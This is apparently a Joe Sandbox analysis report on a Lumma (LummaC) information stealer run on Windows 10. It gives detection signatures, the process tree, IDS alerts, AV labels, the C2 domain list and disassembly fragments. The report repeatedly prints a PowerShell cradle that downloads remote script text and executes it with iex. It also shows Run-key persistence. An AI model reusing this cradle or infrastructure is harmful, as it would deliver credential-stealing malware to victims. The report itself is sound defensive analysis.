Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1519581
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6784 cmdline: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7052 cmdline: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • PrivacyDrive.exe (PID: 2504 cmdline: "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" MD5: 80C2A36E9A14E3EDBA0B706D2433D9B8)
        • WerFault.exe (PID: 3384 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 2212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 6012 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 7100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • PrivacyDrive.exe (PID: 764 cmdline: "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" MD5: 80C2A36E9A14E3EDBA0B706D2433D9B8)
    • WerFault.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", "racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x5ad2f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x5ad2f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: PowerShell Download and Execution Cradles
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6024, ProcessCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ProcessId: 6784, ProcessName: cmd.exe
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RATU0Beb
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
    Sigma detected: PowerShell Web Download
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6024, ProcessCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ProcessId: 6784, ProcessName: cmd.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6024, ProcessCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ProcessId: 6784, ProcessName: cmd.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6784, ParentProcessName: cmd.exe, ProcessCommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, ProcessId: 7052, ProcessName: powershell.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 732, ProcessName: svchost.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T17:46:48.562552+020020546531A Network Trojan was detected192.168.2.449744172.67.206.221443TCP
    2024-09-26T17:46:49.598721+020020546531A Network Trojan was detected192.168.2.449745172.67.206.221443TCP
    2024-09-26T17:46:59.100244+020020546531A Network Trojan was detected192.168.2.449748172.67.206.221443TCP
    2024-09-26T17:47:00.280736+020020546531A Network Trojan was detected192.168.2.449749172.67.206.221443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T17:46:48.562552+020020498361A Network Trojan was detected192.168.2.449744172.67.206.221443TCP
    2024-09-26T17:46:59.100244+020020498361A Network Trojan was detected192.168.2.449748172.67.206.221443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T17:46:49.598721+020020498121A Network Trojan was detected192.168.2.449745172.67.206.221443TCP
    2024-09-26T17:47:00.280736+020020498121A Network Trojan was detected192.168.2.449749172.67.206.221443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T17:46:48.357475+020020560791Domain Observed Used for C2 Detected192.168.2.449744172.67.206.221443TCP
    2024-09-26T17:46:49.125919+020020560791Domain Observed Used for C2 Detected192.168.2.449745172.67.206.221443TCP
    2024-09-26T17:46:58.843588+020020560791Domain Observed Used for C2 Detected192.168.2.449748172.67.206.221443TCP
    2024-09-26T17:46:59.804866+020020560791Domain Observed Used for C2 Detected192.168.2.449749172.67.206.221443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-26T17:46:47.842585+020020560781Domain Observed Used for C2 Detected192.168.2.4505461.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://racedsuitreow.shop/PAvira URL Cloud: Label: malware
    Source: https://finalstepgo.com/Avira URL Cloud: Label: malware
    Source: covvercilverow.shopAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiJV&Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiU.hAvira URL Cloud: Label: malware
    Source: https://finalstepgo.com/uploads/il222.zipAvira URL Cloud: Label: malware
    Source: pumpkinkwquo.shopAvira URL Cloud: Label: malware
    Source: abortinoiwiam.shopAvira URL Cloud: Label: malware
    Source: deallyharvenw.shopAvira URL Cloud: Label: malware
    Source: https://finalstepgo.com/uploads/il222.zipKAvira URL Cloud: Label: malware
    Source: https://finalstepgo.com:443/uploads/il222.zipAvira URL Cloud: Label: malware
    Source: defenddsouneuw.shopAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiVAvira URL Cloud: Label: malware
    Source: priooozekw.shopAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/)e3Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com/aAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apisPAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/3Avira URL Cloud: Label: malware
    Source: surroundeocw.shopAvira URL Cloud: Label: malware
    Source: racedsuitreow.shopAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop:443/apiAvira URL Cloud: Label: malware
    Source: candleduseiwo.shopAvira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apieAvira URL Cloud: Label: malware
    Source: https://finalstepgo.com/uploads/il2.txtAvira URL Cloud: Label: malware
    Source: https://finalstepgo.com:443/uploads/il222.zipeAvira URL Cloud: Label: malware
    Found malware configuration
    Source: PrivacyDrive.exe.764.8.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", "racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}
    Sample uses string decryption to hide its real strings
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: covvercilverow.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: surroundeocw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: abortinoiwiam.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: pumpkinkwquo.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: priooozekw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: deallyharvenw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: defenddsouneuw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: racedsuitreow.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: candleduseiwo.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmpString decryptor: yJEcaG--rui1222
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0052D130 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,4_2_0052D130
    Source: unknownHTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00477BE0 FindFirstFileW,4_2_00477BE0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00495D80 FindFirstFileW,FindClose,4_2_00495D80
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_00F96013
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_00F9600C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]4_2_00F911B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_00FAD0CE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]4_2_00FA2132
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_00FAD134
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FC12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h4_2_00FC12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FCC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_00FB429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_00FB429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00FBC282
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh4_2_00FC5272
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_00FB4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_00FB4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh4_2_00FC63F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_00F9539E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_00FA8312
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h4_2_00F974E1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]4_2_00F8F4B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, 0000000Bh4_2_00FB54B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebp, word ptr [edi]4_2_00FC0432
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]4_2_00FA2403
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]4_2_00FB45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00FB45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_00FB45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]4_2_00FA25AE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00FA8582
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FAF577
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_00F9F6C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]4_2_00F866B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FAA692
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh4_2_00FAD652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh4_2_00FAD652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00FCB612
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_00FB076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_00FB076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]4_2_00F87712
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx4_2_00F958A8
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx4_2_00F9F835
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FC9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh4_2_00FC9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_00F959AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]4_2_00F959AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_00F9C952
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_00F92911
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h4_2_00F97AF3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax4_2_00F97BF4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_00FCBBE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h4_2_00FA0B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [esi], ax4_2_00FA0B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, eax4_2_00F88B72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp ecx4_2_00FC0B62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00FB4B4C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]4_2_00FC2B02
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]4_2_00F94DDD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00FB1DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_00FA9DA7
